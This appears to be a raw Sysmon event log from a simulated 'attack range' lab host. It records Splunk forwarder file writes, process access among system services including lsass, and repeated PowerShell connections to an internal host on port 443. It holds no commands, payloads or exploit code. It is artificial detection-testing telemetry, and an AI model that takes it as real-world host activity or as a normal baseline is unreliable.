23542300x800000000000000035343600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:37.728{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F2E904B255BDE2372E35FC5FA1EDC49,SHA256=B4B5C1B72DA6F25681912CD0FA07E7354C645DFD97FA7D34F691EC7F7F1C6586,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:37.147{B81B27B7-4012-611D-0D00-00000000C801}7922756C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0C00-00000000C801}732C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:37.147{B81B27B7-4012-611D-0D00-00000000C801}7922756C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0F00-00000000C801}924C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:37.147{B81B27B7-4012-611D-0D00-00000000C801}7922756C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035343596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:02.284{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52571-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:38.746{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FCBFC3FEB033025B3ECC7507AC38833,SHA256=2322E35ABA734C7065C58C277A575DDDC4C1460D795EDBB51281BA5AAA8B6BF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:39.761{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C6D0E0C01F6CBA40B618DA171A0E7C7,SHA256=61AEBFB41240229E20CF6BBBE5704CDB4FA2C0445D1432FC3009FEA9355985E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:40.824{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB6A90E336E0F494670BF2F98CDAAFF4,SHA256=1F439BFFDC866183DD5F8F971812A11E95A293B70323E509CEB68D259C253DD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:05.230{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52572-false10.0.1.12-8000- 23542300x800000000000000035343606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:41.843{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5548BBF30608662035C5FE4D44037985,SHA256=21DD7FC95B3C4DA897064DDDFC73167FD1F984193C29EB1966F061DFF720668C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:41.325{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D68BD6E6CE1F43C98E18AB91984561CC,SHA256=042374DF5ACD806F257EE429C18C0373998B94CA115EB24FF16EA683D10D1231,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:42.843{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E222E61F2C8174DD33061AA398E240,SHA256=735797CD7AF06FF0E816C14174FBEF3796EC5F26754F1989158459E784D5E887,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:07.297{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52573-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:43.846{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B5EC67B7477C3002536A3CFE890F6C9,SHA256=45FEAB29BC8B9C1681FF9DB7D04F3E84581D5FC5A67C37272A8B0EF9A5C4D1C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:44.909{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1FDD99C3FDDA12C47F79C68ABE2747B8,SHA256=EB81A554D28AE453200993B13806482669E3D8DD419F025B121A45D6A81A628E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:44.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=251260D3687C1DAA6B057B0A9D685569,SHA256=27515CC2CFAD9E858374D71D58DD6E8D66A20B6150D72EE5AC693F03AA00E3A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:45.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91A9FA8AA2A81EB12A2D0AE08473F35F,SHA256=419AF503AD3ED129D995200881AA35591F500F0B1EE71F28C19D475C342C854E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:46.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA2A05B013369193968C3EC27ACDC97D,SHA256=0A8E134A3F646496DFDD620989789CC1ED96E72D9C0BCECC1C564094322242B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:11.178{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52574-false10.0.1.12-8000- 23542300x800000000000000035343616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:47.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=402B4D2C5D90B1C14583F136C758B2D0,SHA256=79A047A1B9CAE69C1C48D3CE2FA8BE0442D2EF6D67B4CE737CDA5B2C53789FBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:47.339{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=99FA764512D0D89A36EE7E20CEE289C9,SHA256=83F41B7F257168AACE38364F2B127AA19B3E2CD45AA020D05EF031CC25E03446,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:48.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=856A20641AAFAF668D706FEE1800D2D9,SHA256=90851C77EC629414035F2636C8358B1274E860F11CF11E0C0098DB38DAE50AA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:13.308{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52575-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:49.968{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D51C170DA172B70DCD32E67CDEC0B18E,SHA256=9C8D8CC5F923972F6E2E4C4FCC46B1334DE78A5A9A049D42B5F08E08E0F42B50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:50.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD86D81B313F653CF633EE03354BDC84,SHA256=FD071DD0D5156D152FDEBFA4D6A43440D5914C1C326F1FE53FB1298C12944DB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.321{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52577-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:17.024{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52576-false10.0.1.12-8000- 23542300x800000000000000035343621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:51.052{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7D2A1F37587AEA7AAD89E411EB4C2CD7,SHA256=437A311410319CE817B16451B51F99AD5ABF24A6CA96FF70C36AE9133B14010C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:51.999{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FB6C99B4B923360DA3683DE063CB5A8,SHA256=8AD88C4F937E4B6DCABC09B9B651C321A49098F4E12C8CC4A2C9A7EB497C4708,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:53.015{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98FFFB388889AD1DCD1FE25E2C8AD702,SHA256=9BE5C526EE9BEAED9A702118AF53ACD54AFABF1D23AC96B366719BB8C401B38F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:54.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDAB2680CFF7805A3D564CE8BB13DAB3,SHA256=9E5AC7582DE52FD89A2CCCCE8F2030DA2FAF6CBF8CFC95AEAD2E36A3E5F76AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:55.049{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05D13A3816C69D7439CB5E7BD077AED7,SHA256=507C7A38B2DB1F943D6913AED085F4F161CA039DA4C3EB3597AE9ECAE3928B70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:22.339{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52579-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:22.054{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52578-false10.0.1.12-8000- 10341000x800000000000000035343660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.379{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.379{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.379{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035343657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8AAF6E90D108597CB92A0DA5C94750AD,SHA256=2E10E489A7B2C11E697A5880B23FBC9A7BD0446484BA23A503ECFBF30115280C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.348{B81B27B7-4013-611D-1600-00000000C801}11965272C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-62B4-03000000C801}6700C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+3ef6a|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.332{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-62B4-03000000C801}6700C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.332{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7454-613B-62B4-03000000C801}6700C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343653Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.316{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-7454-613B-62B4-03000000C801}6700C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343652Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:56.295{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 